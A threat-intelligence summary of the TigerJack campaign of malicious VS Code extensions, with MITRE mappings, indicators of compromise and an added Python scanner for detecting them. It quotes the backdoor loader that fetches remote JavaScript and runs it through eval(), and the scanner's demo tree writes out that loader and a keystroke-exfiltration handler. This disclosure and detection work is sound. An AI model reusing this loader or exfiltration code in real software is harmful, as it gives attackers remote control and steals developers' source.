TigerJack’s Extensions Keep Stealing from Developers Across Various Marketplaces | Koi Blog

TigerJack is a threat actor who published at least 11 malicious VS Code extensions across multiple publisher accounts that steal C++ source code, mine cryptocurrency, and provide a remote backdoor for full system control. Two extensions alone, “C++ Playground” and “HTTP Format”, infected over 17,000 developers before removal from Microsoft’s marketplace but remain active on OpenVSX. The operation uses deceptive, fully functional tools, staged clean releases, coordinated republication, and centralized command-and-control endpoints to persist and scale its campaign. #TigerJack #C++Playground #HTTPFormat #ab498.pythonanywhere.com #CoinIMP

Keypoints

  • TigerJack published at least 11 malicious VS Code extensions across three publisher accounts (ab-498, 498, 498-00), using professional-looking tooling to gain trust and installs.
  • The “C++ Playground” extension exfiltrated complete C++ source files in real time by listening to document change events and posting JSON payloads to remote endpoints (e.g., ab498.pythonanywhere.com).
  • The “HTTP Format” extension performed covert cryptocurrency mining via hardcoded CoinIMP credentials and API endpoints, significantly raising CPU usage on infected machines.
  • Multiple extensions (498.cppplayground, 498.httpformat, 498.pythonformat) contained identical backdoor code that fetched and eval()’d remote JavaScript every 20 minutes, enabling arbitrary remote code execution.
  • TigerJack used a trojan-horse strategy by first publishing benign extensions to build reputation before pushing malicious updates; when removed from VS Code, many extensions persisted on OpenVSX and were republished under new accounts.
  • Microsoft quietly removed some extensions after thousands were compromised but provided no user notifications, leaving developers unaware and vulnerable; alternative marketplaces lack equivalent detection controls.
  • Koi proposes continuous, cross-marketplace scanning and automatic remediation to detect and remove malicious extensions before they impact development environments.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – The backdoor periodically fetches and executes JavaScript from a remote server using eval(): “let remoteCode = await ( await fetch('https://ab498.pythonanywhere.com/static/in4.js') ).text(); if (remoteCode != previousCode) { eval(remoteCode); }”
  • [T1071] Application Layer Protocol – Malicious extensions exfiltrate code and communicate with C2 over HTTPS endpoints such as “https://ab498.pythonanywhere.com/test4” and “https://api.codex.jaagrav.in” to send JSON payloads containing source code.
  • [T1020] Automated Exfiltration – The “C++ Playground” extension registers a document change listener and transmits captured C++ source code automatically after short delays: “Every keystroke triggers this function after a 500-millisecond delay… Your complete source code gets packaged into JSON payloads and transmitted to multiple endpoints.”
  • [T1496] Resource Hijacking – The “HTTP Format” extension embedded CoinIMP mining credentials and used API endpoints to mine cryptocurrency on infected hosts, increasing CPU usage and degrading performance: “Secret crypto mining by the extension increases the computer’s CPU usage.”
  • [T1078] Valid Accounts (Implied) – Use of legitimate extension marketplace accounts and staged clean releases to establish trust and persist installations (trojan-horse strategy) by publishing benign versions before malicious updates.

Indicators of Compromise

  • [Domain] C2 and service endpoints – ab498.pythonanywhere[.]com, api.codex.jaagrav[.]in
  • [Domain] Cryptocurrency mining service – coinimp[.]com (used with the hardcoded Site Key and API Key shown in the article)
  • [Extension Names] Malicious/republished VS Code extensions – ab-498.cppplayground, ab-498.httpformat, ab-498.pythonformat, 498.cppplayground, 498.httpformat, 498.pythonformat, 498-00.cppplayground, 498-00.cppformat, 498-00.pythonformat, 498-00.testwebext, ab-498.cppformat
  • [Hardcoded Credentials] CoinIMP mining keys in extension code – Site Key: 53415facb13dccbdf8523b5eefd45d01f6b16bf984cd8cf39ac04150266a4cd9, API Key: a8cf5c9291594c471bb786dcadeb9845bc3cc26a17ec52ec632a9bb7844e5b87
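The indicators above and the two behaviours described under the MITRE techniques (a fetch-then-eval() loader, and a document change listener that posts source code out) are enough to triage a developer workstation offline. The following scanner is an added example written for this summary; it is not Koi's tooling and not code from any of the extensions. It assumes the usual on-disk layout of VS Code and OpenVSX extensions (one `<publisher>.<name>-<version>` directory per extension containing `package.json` and JavaScript sources), and the sample extension tree it builds in a temporary directory is constructed for the demonstration, loosely modelled on the loader snippet quoted above.

```python
"""Triage installed VS Code / OpenVSX extensions against the TigerJack indicators
from the Koi write-up and against two generic behaviours: remote JS reaching
eval(), and a document change listener feeding fetch().

Added example, not Koi's tooling. Assumed layout (standard for VS Code):
<extensions_root>/<publisher>.<name>-<version>/package.json + JS sources.
"""
import json
import re
import tempfile
from pathlib import Path

# Indicators taken from the article's IoC section.
IOC_DOMAINS = ("ab498.pythonanywhere.com", "api.codex.jaagrav.in", "coinimp.com")
IOC_KEYS = (
    "53415facb13dccbdf8523b5eefd45d01f6b16bf984cd8cf39ac04150266a4cd9",
    "a8cf5c9291594c471bb786dcadeb9845bc3cc26a17ec52ec632a9bb7844e5b87",
)
IOC_PUBLISHERS = ("ab-498", "498", "498-00")

# Behavioural patterns (independent of the specific domains/keys):
#  - a fetch(...) call followed within 300 chars by eval(  (remote code loader)
#  - onDidChangeTextDocument followed within 800 chars by fetch( (keystroke exfil)
EVAL_FETCH_RE = re.compile(r"fetch\s*\([^)]*\)[\s\S]{0,300}?\beval\s*\(")
DOC_CHANGE_EXFIL_RE = re.compile(r"onDidChangeTextDocument[\s\S]{0,800}?\bfetch\s*\(")

SOURCE_SUFFIXES = {".js", ".cjs", ".mjs", ".ts", ".json"}


def scan_file(path: Path) -> list:
    """Return (indicator_type, detail) hits for one source file."""
    try:
        text = path.read_text(encoding="utf-8", errors="ignore")
    except OSError:
        return []
    hits = [("domain", d) for d in IOC_DOMAINS if d in text]
    hits += [("coinimp_key", k[:8] + "...") for k in IOC_KEYS if k in text]
    if EVAL_FETCH_RE.search(text):
        hits.append(("remote_eval", "fetch() result reaches eval()"))
    if DOC_CHANGE_EXFIL_RE.search(text):
        hits.append(("doc_change_exfil", "document change listener calls fetch()"))
    return hits


def scan_extensions(root: Path) -> dict:
    """Map extension directory name -> list of (type, detail, relative_file) findings."""
    findings = {}
    for ext_dir in sorted(p for p in root.iterdir() if p.is_dir()):
        ext_hits = []
        manifest = ext_dir / "package.json"
        if manifest.is_file():
            try:
                publisher = json.loads(manifest.read_text(encoding="utf-8")).get("publisher", "")
            except (OSError, ValueError):
                publisher = ""
            if publisher in IOC_PUBLISHERS:  # publisher IDs named in the article
                ext_hits.append(("publisher", publisher, "package.json"))
        for path in ext_dir.rglob("*"):
            if path.is_file() and path.suffix in SOURCE_SUFFIXES:
                rel = str(path.relative_to(ext_dir))
                ext_hits += [(kind, detail, rel) for kind, detail in scan_file(path)]
        if ext_hits:
            findings[ext_dir.name] = ext_hits
    return findings


def build_sample_tree(root: Path) -> None:
    """Write a CONSTRUCTED sample tree: one benign extension, one mimicking the loader."""
    benign = root / "acme.formatter-1.0.0"
    benign.mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps({"publisher": "acme", "name": "formatter"}))
    (benign / "extension.js").write_text(
        "const vscode = require('vscode');\n"
        "exports.activate = () => vscode.commands.registerCommand('acme.fmt', () => {});\n"
    )
    bad = root / "498.cppplayground-0.0.9"
    (bad / "out").mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({"publisher": "498", "name": "cppplayground"}))
    (bad / "out" / "loader.js").write_text(  # constructed, modelled on the quoted snippet
        "let previousCode = '';\n"
        "setInterval(async () => {\n"
        "  let remoteCode = await (await fetch('https://ab498.pythonanywhere.com/static/in4.js')).text();\n"
        "  if (remoteCode != previousCode) { eval(remoteCode); }\n"
        "}, 20 * 60 * 1000);\n"
    )
    (bad / "out" / "exfil.js").write_text(  # constructed keystroke-exfil shape
        "vscode.workspace.onDidChangeTextDocument(e => setTimeout(() => {\n"
        "  fetch(ENDPOINT, { method: 'POST', body: JSON.stringify({ code: e.document.getText() }) });\n"
        "}, 500));\n"
    )


def demo() -> dict:
    """Build the constructed sample tree and scan it; returns the findings dict."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return scan_extensions(root)


if __name__ == "__main__":
    # For a real host, call scan_extensions(Path.home() / ".vscode" / "extensions") instead.
    for ext, hits in demo().items():
        print(ext)
        for kind, detail, where in hits:
            print(f"  [{kind}] {detail} ({where})")
```

The string indicators catch the specific campaign; the two regexes are what carry over to the republished copies under new publisher names, since the article notes the backdoor code was identical across `498.*` extensions. Expect false positives from the behavioural rules on legitimate extensions that update themselves or sync documents, so treat a `remote_eval` or `doc_change_exfil` hit as a prompt to read the file, not as a verdict.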


Read more: https://www.koi.ai/blog/tiger-jack-malicious-vscode-extensions-stealing-code